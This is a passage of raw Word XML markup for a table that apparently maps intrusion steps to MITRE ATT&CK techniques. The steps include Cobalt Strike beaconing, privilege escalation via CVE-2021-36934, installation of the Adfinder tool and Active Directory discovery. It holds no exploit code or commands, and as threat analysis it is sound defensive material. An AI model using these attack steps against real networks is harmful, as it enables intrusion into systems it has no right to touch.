                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Cobalt Strike Beacon begins communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007257FE" w:rsidRPr="00B857D7" w14:paraId="7A73A42F" w14:textId="77777777" w:rsidTr="00FD53AB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="705F21F9" w14:textId="51BEA07F" w:rsidR="007257FE" w:rsidRDefault="007257FE" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CA74067" w14:textId="77777777" w:rsidR="007257FE" w:rsidRPr="00B857D7" w:rsidRDefault="007257FE" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B2208A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B2208A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0004 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B2208A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="075E551C" w14:textId="77777777" w:rsidR="007257FE" w:rsidRPr="00B857D7" w:rsidRDefault="007257FE" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B2208A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B2208A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1068 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B2208A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exploitation for Privilege Escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48F3D4A9" w14:textId="4826FF4B" w:rsidR="007257FE" w:rsidRDefault="005840B2" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D3227CB" w14:textId="77777777" w:rsidR="007257FE" w:rsidRPr="00B857D7" w:rsidRDefault="007257FE" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="182D6CC4" w14:textId="77777777" w:rsidR="007257FE" w:rsidRPr="00B857D7" w:rsidRDefault="007257FE" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21B262C3" w14:textId="77777777" w:rsidR="007257FE" w:rsidRPr="00B857D7" w:rsidRDefault="007257FE" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-PES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="008CCE4F" w14:textId="77777777" w:rsidR="007257FE" w:rsidRDefault="007257FE" w:rsidP="00FD53AB">
            <w:r>
              <w:t>[3] CVE-2021-36934</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53839839" w14:textId="44E320E1" w:rsidR="0038294C" w:rsidRPr="00B857D7" w:rsidRDefault="0038294C" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>See also [7]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00967E60" w:rsidRPr="005B3D45" w14:paraId="70180792" w14:textId="77777777" w:rsidTr="00F24917">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32610851" w14:textId="6BF1A6F4" w:rsidR="00967E60" w:rsidRPr="005B3D45" w:rsidRDefault="00967E60" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F88E8C9" w14:textId="77777777" w:rsidR="00967E60" w:rsidRPr="005B3D45" w:rsidRDefault="00967E60" w:rsidP="00F24917">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463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52574D4C" w14:textId="77777777" w:rsidR="00967E60" w:rsidRPr="005B3D45" w:rsidRDefault="00967E60" w:rsidP="00F24917">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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A3D341F" w14:textId="59E4C710" w:rsidR="00967E60" w:rsidRPr="005B3D45" w:rsidRDefault="008135C1" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19058F76" w14:textId="77777777" w:rsidR="00967E60" w:rsidRPr="005B3D45" w:rsidRDefault="00967E60" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="055D61A3" w14:textId="77777777" w:rsidR="00967E60" w:rsidRPr="005B3D45" w:rsidRDefault="00967E60" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A774D6E" w14:textId="77777777" w:rsidR="00967E60" w:rsidRPr="005B3D45" w:rsidRDefault="00967E60" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DE25D08" w14:textId="6D9C09EE" w:rsidR="00967E60" w:rsidRPr="005B3D45" w:rsidRDefault="00967E60" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD088D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Communication leading to installation of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Adfinder</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007257FE" w:rsidRPr="00B857D7" w14:paraId="7F50BBD2" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CC014C4" w14:textId="7FB2DA0C" w:rsidR="007257FE" w:rsidRDefault="00967E60" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FE987AF" w14:textId="433B399F" w:rsidR="007257FE" w:rsidRPr="00B857D7" w:rsidRDefault="007257FE" w:rsidP="000C0ACD">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463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D070E4E" w14:textId="3BA10C97" w:rsidR="007257FE" w:rsidRPr="00527381" w:rsidRDefault="005840B2" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02BC95FD" w14:textId="2BAE2B23" w:rsidR="007257FE" w:rsidRDefault="008135C1" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17D2C19C" w14:textId="77777777" w:rsidR="007257FE" w:rsidRPr="00B857D7" w:rsidRDefault="007257FE" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B5A4815" w14:textId="1B1CB5D1" w:rsidR="007257FE" w:rsidRDefault="005840B2" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="218BFFE8" w14:textId="76A80B54" w:rsidR="007257FE" w:rsidRDefault="005840B2" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12E53C8D" w14:textId="2B2D6829" w:rsidR="007257FE" w:rsidRDefault="007257FE" w:rsidP="000C0ACD">
            <w:r>
              <w:t xml:space="preserve">[3] Install </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Adfinder</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> - </w:t>
            </w:r>
            <w:r w:rsidRPr="007257FE">
              <w:t>A tool to query the Active Directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w14:paraId="1FCF0409" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3467EB6F" w14:textId="16352B8B" w:rsidR="000C0ACD" w:rsidRDefault="00C335AD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00967E60">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11BFE3DC" w14:textId="4DECE5ED" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">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w:t>
            </w:r>
            <w:r w:rsidR="002F0F12">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">7 </w:t>
            </w:r>
            <w:r w:rsidR="00150521">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00150521">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09951CEE" w14:textId="5DEE1750" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1087.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Domain Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38839E2B" w14:textId="3B06C3B9" w:rsidR="000C0ACD" w:rsidRDefault="008135C1" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7678882A" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64F091B3" w14:textId="007580AB" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C57AAF1" w14:textId="33CEE2DF" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="00131E77" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63DAA143" w14:textId="55E94000" w:rsidR="000C0ACD" w:rsidRDefault="00CD088D" w:rsidP="000C0ACD">
            <w:r>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidR="000C0ACD">
              <w:t xml:space="preserve">Once attackers have a foothold on the machine, they usually deploy additional tools to gather </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A45B8CB" w14:textId="556978EE" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>information about the host system or other machines in the same network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w14:paraId="53B78F04" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="341598F9" w14:textId="3A295F1D" w:rsidR="000C0ACD" w:rsidRDefault="00C335AD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00967E60">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B9A4826" w14:textId="143D8DD1" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">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w:t>
            </w:r>
            <w:r w:rsidR="002F0F12">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">7 </w:t>
            </w:r>
            <w:r w:rsidR="00150521">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00150521">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28CE9C6B" w14:textId="58056409" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1082 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
